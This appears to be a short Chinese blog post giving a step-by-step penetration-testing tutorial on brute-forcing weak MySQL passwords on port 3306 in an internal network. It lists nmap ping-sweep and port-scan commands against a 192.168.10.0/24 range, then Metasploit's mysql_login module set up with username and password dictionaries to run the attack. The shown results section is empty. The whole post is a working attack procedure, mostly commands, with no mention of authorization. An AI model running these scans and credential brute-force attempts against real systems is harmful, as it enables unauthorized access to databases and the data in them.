内网渗透-3306端口弱密码爆破

1、收集IP信息:

(1)获取内网IP地址段,使用ping 内网系统的域名,得到内网IP地址段:

2)使用: nmap -sP 192.168.10.0/24 网段内活着的IP地址:发现活着的IP主机有256个,即192.168.10.0-192.168.10.255

  nmap具体使用方法可以参考:https://www.cnblogs.com/justn0w/articles/10177612.html

2、扫描开放3306端口的IP:

(1)将收集到的活着的ip放到一个txt文件夹中,利用:nmap -iL ip.txt 进行批量扫描端口;

(2)使用:nmap -PR -oN /home/xh/shentou/out.log 192.168.10.0/24 直接 扫描一个网段内所有的iP,扫描的结果会保存在out.log里面;

3.使用Metasploit工具进行3306端口爆破:

参考:https://blog.csdn.net/qq_45089570/article/details/104570362?fps=1&locationNum=2

(1)在kali机器中,在终端输入msfconsole,打开metasploit工具;

(2)search mysql

 (3)use auxiliary/scanner/mysql/mysql_login

设置
set RHOST 192.168.10.3
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要爆破成功就停止)
run 启动攻击,开始爆破
爆破结果如下:

 

 

posted @ 2020-03-17 17:15  唯安格  阅读(7660)  评论(0编辑  收藏  举报